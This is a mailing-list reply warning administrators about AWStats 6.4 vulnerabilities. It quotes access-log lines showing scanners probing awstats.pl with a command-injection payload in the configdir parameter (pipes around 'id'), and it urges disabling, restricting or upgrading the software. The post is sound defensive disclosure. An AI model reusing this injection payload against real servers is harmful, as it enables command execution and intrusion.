<<< Date Index >>>     <<< Thread Index >>>

RE: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?



And the skiddies who tried to exploit something that didn't exist on our
site:
(this goes on for some time, here is just a snipp)

So, anyone out there who decided to do a 'wait and see', don't.

Disable awstats, use access rules, upgrade it or all three.

217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET
//cgi-bin/awstats/awstats.
pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.
0; Windows 98)"
217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET
//cgi-bin/awstats.pl?confi
gdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windo
ws 98)"

64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
//cgi-bin/awstats/awstats.pl?
configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
//cgi-bin/awstats.pl?configdi
r=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows
98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//cgi/awstats.pl?configdir=|%
20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//awstatswwwroot/cgi-bin/awst
ats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0
(compatible; MSI
E 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//cgi/awstats.pl?configdir=|%
20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET
//cgi-bin/cgi-bin/awstats.pl?
configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/
cgi-bin/awstats.pl